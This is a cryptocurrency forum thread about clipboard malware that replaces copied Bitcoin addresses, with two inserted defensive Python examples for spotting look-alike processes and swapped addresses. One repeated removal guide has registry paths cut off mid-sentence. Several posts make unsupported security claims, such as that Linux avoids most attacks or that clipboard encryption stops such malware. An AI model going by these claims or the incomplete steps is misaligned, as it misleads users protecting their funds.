You should be able to just use a program like dd to clear out the disk, and then you will be able to install an operating system again.

Everything important was backed up on an external disk so my data was safe. I have not checked if gparted can read the partitions yet but I think it should. I do have a bit of fun trying to get access to the disks.

I have tried to secure a disk in Windows but every live CD was able to read it. Don't get why Linux is so much better at this.

Title: Re: Bitcoin Malware
Post by: mallard on September 05, 2015, 02:59:38 PM

No anti-this and anti-that software. Ditch Windows and use Linux, you'll avoid most of these types of attacks.
If you are looking for a linux version that has a windows feel I suggest Linux Mint, you can use wine for most windows programs but games have a lot of compatibility issues.

Don't forget linux is free :

Is linuxmint more secure than ubuntu?

What are the differences between the 2?

What about keyloggers, webcam trojans, clipboard stealers, kernel malware and screen capture malware?

Linux Mint is based on Ubuntu.
There isn't much difference between the two.

Title: Re: Bitcoin Malware
Post by: confirmation120 on September 05, 2015, 04:22:56 PM
i recently found a malware that changes bitcoin addresses when copied to the hackers address so just watch out and check to make sure that the bitcoin address you copy comes out the same when you paste it  :)
Didn't know this kind of malware exists. I need to check and scan my laptop right away after reading this

Title: Re: Bitcoin Malware
Post by: seVell on September 09, 2015, 11:40:38 PM
i recently found a malware that changes bitcoin addresses when copied to the hackers address so just watch out and check to make sure that the bitcoin address you copy comes out the same when you paste it  :)

it is safer to store your coins on a hardware wallet:

Doesn't this malware work even if you use a Trezor for example? I guess that people should be always careful and double check. MyTrezor Web wallet works in the browser as well.

The truth of the matter is that everybody should be double checking whether addresses are changed. If anybody can have a copy of this malware for $1, this means that this malware can become very widespread.

Not to mention that you have to trust the hardware manufacturer and the seller and probably other middlemen.

Title: Re: Bitcoin Malware
Post by: Remember remember the 5th of November on September 10, 2015, 01:23:53 AM
Chrome is the malware.

it seems logical ...  ;D

You made me doublecheck :)
As usual, the malware seems to be using names quite similar with known software.
The normal browser is chrome.exe, not chrome32.
I guess that the same story goes to acrobat reader too, but since I don't use it I cannot check.

But really, the ones who run windoze with no antivirus on... they just ask for it.
That's very clever. Since Chrome spawns multiple instances of itself, it can be very easy to disguise a process with the same name, nobody will be any wiser.
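The look-alike names discussed above can be told apart by where the executable runs from rather than by what it is called. The following is an added example, not part of any post in this thread: it flags process records whose path sits in the two folders named in the removal guide, or whose name matches but whose path is outside Program Files (an assumption about where genuine copies live). The process list is constructed sample data.

```python
import ntpath

# Process names the thread reports the malware running under.
SUSPECT_NAMES = {"chrome32.exe", "acrord32.exe"}
# Folders the thread's removal guide says to delete, lower-cased with backslashes.
SUSPECT_DIRS = ("\\appdata\\roaming\\adobe (x86)\\", "\\appdata\\local\\google (x86)\\")
# Assumption: genuine copies of these programs run from a Program Files directory.
TRUSTED_ROOTS = ("c:\\program files\\", "c:\\program files (x86)\\")


def classify(name, path):
    """Label one process record: 'malware-folder', 'odd-location' or 'ok'."""
    image = ntpath.normpath(path).lower()  # also turns '/' into '\\'
    if any(folder in image for folder in SUSPECT_DIRS):
        return "malware-folder"
    if name.lower() in SUSPECT_NAMES and not image.startswith(TRUSTED_ROOTS):
        return "odd-location"
    return "ok"


def scan(processes):
    """Return (name, path, label) for every record that is not 'ok'."""
    hits = []
    for name, path in processes:
        label = classify(name, path)
        if label != "ok":
            hits.append((name, path, label))
    return hits


# Constructed sample of (image name, full path) pairs, as a process listing would give.
SAMPLE = [
    ("chrome.exe", r"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"),
    ("chrome.exe", r"C:\Users\alice\AppData\Local\Google\Chrome\Application\chrome.exe"),
    ("AcroRd32.exe", r"C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AcroRd32.exe"),
    ("AcroRd32.exe", "C:/Users/alice/AppData/Roaming/Adobe (x86)/AcroRd32.exe"),
    ("Chrome32.exe", r"C:\Users\alice\AppData\Local\Google (x86)\Chrome32.exe"),
    ("Chrome32.exe", r"C:\Users\alice\Downloads\Chrome32.exe"),
]

if __name__ == "__main__":
    for name, path, label in scan(SAMPLE):
        print(f"{label:15} {name:13} {path}")
```

The per-user Chrome path in the sample stays unflagged because the folder match is on "Google (x86)", not "Google".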

Title: Re: Bitcoin Malware
Post by: Kakmakr on September 10, 2015, 06:02:30 AM
Just check the address after you pasted it, and you would be fine.  ;) I have 1 FREE anti-virus software package and 1 Full commercial version installed on one computer, and I have had no problems at all so far. < Avast & Kaspersky > Luckily these two have not clashed, because they usually do.

Keep some honey traps around to trigger flags when possible hacks are being done on you. <Small amounts of coins in wallets, easily accessible> When they are empty and you have not done that, you know you are compromised.   
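Checking the pasted address against the copied one, as an added example that is not part of any post in this thread: a swapped-in address is itself well formed, so its Base58Check checksum passes and only a full comparison with the original catches it. The code handles legacy Base58Check addresses only, and the two addresses are constructed from dummy bytes.

```python
import hashlib

B58 = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"


def _checksum(data):
    """First 4 bytes of double SHA-256, as used by Base58Check."""
    return hashlib.sha256(hashlib.sha256(data).digest()).digest()[:4]


def b58check_encode(version, payload):
    raw = bytes([version]) + payload
    raw += _checksum(raw)
    num, out = int.from_bytes(raw, "big"), ""
    while num:
        num, rem = divmod(num, 58)
        out = B58[rem] + out
    zeros = len(raw) - len(raw.lstrip(b"\0"))  # leading zero bytes become '1'
    return "1" * zeros + out


def b58check_valid(addr):
    """True if addr decodes to 25 bytes whose checksum matches."""
    num = 0
    for ch in addr:
        if ch not in B58:
            return False
        num = num * 58 + B58.index(ch)
    zeros = len(addr) - len(addr.lstrip("1"))
    raw = b"\0" * zeros + num.to_bytes((num.bit_length() + 7) // 8, "big")
    return len(raw) == 25 and raw[-4:] == _checksum(raw[:-4])


def check_paste(copied, pasted):
    """Compare what was copied with what arrived in the paste target."""
    copied, pasted = copied.strip(), pasted.strip()
    if copied == pasted:
        return "match"
    if b58check_valid(pasted):
        return "swapped"    # a different but well-formed address: the hijacker case
    return "corrupted"      # truncated or mistyped text, not a usable address


# Constructed addresses built from dummy 20-byte hashes; nobody's real wallet.
OWN = b58check_encode(0, bytes(range(20)))
OTHER = b58check_encode(0, bytes(range(20, 40)))

if __name__ == "__main__":
    print(check_paste(OWN, OWN), check_paste(OWN, OTHER), check_paste(OWN, OWN[:-3]))
```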

Title: Re: Bitcoin Malware
Post by: Q7 on September 10, 2015, 10:14:42 AM
If you can afford it, get two PCs. I have one with a lower spec which is connected to the internet all the time and I even use it for installing untrusted new software. The other one is basically offline most of the time, with no other software installed on it except browsers, together with my hot wallet.

Title: Re: Bitcoin Malware
Post by: pooya87 on September 10, 2015, 11:50:28 AM
If you can afford it, get two PCs. I have one with a lower spec which is connected to the internet all the time and I even use it for installing untrusted new software. The other one is basically offline most of the time, with no other software installed on it except browsers, together with my hot wallet.

You don't need to spend that much in order to have a secure environment in which you can safely install and use a bitcoin wallet.
All you need is a USB disk, which is super cheap, and Linux, which you can download for free (like Ubuntu).

1) make persistent live linux on the USB disk
2) change a couple of settings so that it would never connect to network.
3) install your favorite bitcoin wallet

**) don't forget to check the signature of both linux and bitcoin wallet

Title: Re: Bitcoin Malware
Post by: JohnBelfast on September 10, 2015, 11:51:38 AM
Most alt coin wallets have some sort of virus in them. Go to altcoin discussion and you will find a thread which highlights all the coins with viruses and exposes them with code references.

Title: Re: Bitcoin Malware
Post by: zero01 on September 10, 2015, 12:29:44 PM
it happened to me about an hour ago but here's a guide on how to get rid of it if it is on your pc
Remove the malware
Finally remove it from your computer:
Start Windows Task Manager and terminate the Chrome32.exe or
AcroRd32.exe process!
Go to %appdata% in your file browser.
Delete AppData/Roaming/Adobe (x86) folder.
Delete AppData/Local/Google (x86) folder.
If you don't terminate the malware manually, as it is described
in the first point you can't delete one of the folders.
If you've deleted the Adobe folder it won't start again on your
computer, so you're good, but to completely remove it you have to
do one more thing:

Start the Registry Editor (regedit) and delete our software from
If you don't find it, check HKEY_LOCAL_MACHINE instead of

hope it helps this malware is being sold for $1.10 in bitcoin

That information is helpful, friend.
I hope that with this information our other friends do not get bitcoin malware.

Title: Re: Bitcoin Malware
Post by: RealBitcoin on September 10, 2015, 04:21:18 PM
it happened to me about an hour ago but here's a guide on how to get rid of it if it is on your pc
Remove the malware
Finally remove it from your computer:
Start Windows Task Manager and terminate the Chrome32.exe or
AcroRd32.exe process!
Go to %appdata% in your file browser.
Delete AppData/Roaming/Adobe (x86) folder.
Delete AppData/Local/Google (x86) folder.
If you don't terminate the malware manually, as it is described
in the first point you can't delete one of the folders.
If you've deleted the Adobe folder it won't start again on your
computer, so you're good, but to completely remove it you have to
do one more thing:

Start the Registry Editor (regedit) and delete our software from
If you don't find it, check HKEY_LOCAL_MACHINE instead of

hope it helps this malware is being sold for $1.10 in bitcoin

This virus is just easier to bypass if you just encrypt your clipboard. It's a clipboard virus, so if anything tries to modify it, it will be signalled, as a modified encryption can't be decrypted after.

There are many tools that can help you with that, so you will be perfectly protected against all kinds of clipboard attacks.

Title: Re: Bitcoin Malware
Post by: balvio on May 23, 2016, 12:52:58 PM
thank you for posting such things, I am a newbie so I find them useful

Title: Re: Bitcoin Malware
Post by: Viyamore on May 23, 2016, 01:04:30 PM
Thank you also for this tutorial information. Many viruses now are scattering on the internet. Sometimes Google, if I open this forum, virus on battery. I do close it always, not cleaning. Then if I will clean, it recommends an app to download and to install. I think it is propaganda or tactics for them to use the application to earn money.

But I haven't encountered that bitcoin malware yet. I think my malware is in the browser.

Title: Re: Bitcoin Malware
Post by: Gaugh on May 23, 2016, 01:16:38 PM
Most alt coin wallets have some sort of virus in them. Go to altcoin discussion and you will find a thread which highlights all the coins with viruses and exposes them with code references.

Well, an altcoin paper wallet cannot have a virus in it. :-\

Title: Re: Bitcoin Malware
Post by: InsideBjorn on May 23, 2016, 01:53:42 PM
There is a lot of bitcoin malware going around these days. They are so stupid and are able to steal your coins, so be careful people and use nice anti-malware bots to locate the bitcoin ones and at least remove them.

Title: Re: Bitcoin Malware
Post by: maudevang on May 23, 2016, 08:27:29 PM
i recently found a malware that changes bitcoin addresses when copied to the hackers address so just watch out and check to make sure that the bitcoin address you copy comes out the same when you paste it  :)
Yeah, you need to watch out with this, hackers are always active at the places where it is about money. Make sure that you keep an eye out for this sort of thing because it can happen out of nowhere.

Title: Re: Bitcoin Malware
Post by: davinchi on May 23, 2016, 08:57:09 PM
Most alt coin wallets have some sort of virus in them. Go to altcoin discussion and you will find a thread which highlights all the coins with viruses and exposes them with code references.

Well, an altcoin paper wallet cannot have a virus in it. :-\
But not all users use paper wallets. Actually, not all even know of paper wallets.
The point here is that viruses/malware/infections are really easy to get without knowing, unless we have the proper tools and software for it.

Title: Re: Bitcoin Malware
Post by: Akupuniard on May 23, 2016, 09:14:59 PM
Malware is so annoying nowadays, also with Windows 10, you can get it from everywhere without any protection. Many anti-virus programs also can alert you about it.

Title: Re: Bitcoin Malware
Post by: Icathia on May 24, 2016, 08:46:47 AM
I have to look out for this they are trying to steal your information and maybe your Bitcoins from you. Always keep check of what you are doing because there is always a chance that you will get a virus.

Title: Re: Bitcoin Malware
Post by: quentincole32 on May 24, 2016, 09:33:29 AM
i recently found a malware that changes bitcoin addresses when copied to the hackers address so just watch out and check to make sure that the bitcoin address you copy comes out the same when you paste it  :)
Never knew about this case and this kind of malware, it's a terrible hacker. I don't think it can be done by a hacker, they should be a pro and smart hacker.
Thanks for sharing, even though you didn't put any proof, but it makes us know about a new case in bitcoin hacking.

Title: Re: Bitcoin Malware
Post by: Juventino02 on May 24, 2016, 06:10:14 PM
I have been in a similar situation. Some captcha sites write that they found a duplicate IP, or they wrote that they added me as a scammer. And why? They block my IP. I talk about sites which pay 1000 or more. Sometimes they wrote that 1000 satoshi were sent to your account; after that I check my account and there are not any satoshis. It seems there are scammers as captcha sites, or there is a scammer who changes the wallet address. Who was in this situation?

Title: Re: Bitcoin Malware
Post by: mobnepal on May 24, 2016, 06:20:20 PM
I have been in a similar situation. Some captcha sites write that they found a duplicate IP, or they wrote that they added me as a scammer. And why? They block my IP. I talk about sites which pay 1000 or more. Sometimes they wrote that 1000 satoshi were sent to your account; after that I check my account and there are not any satoshis. It seems there are scammers as captcha sites, or there is a scammer who changes the wallet address. Who was in this situation?
After claiming in the faucet, you will get to check the address where it sent the bitcoin, and you can check whether it is the same address of yours that you copied earlier or not. If it is changing, then it's better that you install a good antivirus and search for malware.

Title: Re: Bitcoin Malware
Post by: Juventino02 on May 24, 2016, 06:27:11 PM
I have been in a similar situation. Some captcha sites write that they found a duplicate IP, or they wrote that they added me as a scammer. And why? They block my IP. I talk about sites which pay 1000 or more. Sometimes they wrote that 1000 satoshi were sent to your account; after that I check my account and there are not any satoshis. It seems there are scammers as captcha sites, or there is a scammer who changes the wallet address. Who was in this situation?
After claiming in the faucet, you will get to check the address where it sent the bitcoin, and you can check whether it is the same address of yours that you copied earlier or not. If it is changing, then it's better that you install a good antivirus and search for malware.

I have used copy and paste for my wallet address every time. But there is this problem. I have such a strong antivirus, total viewer 360, it tells me which sites or files are dangerous. It never installs virus programs. I think there are scammers in captcha sites. Can you tell me how to increase my satoshis? I want to start without spending money. If you have reliable captcha sites, send me referral links.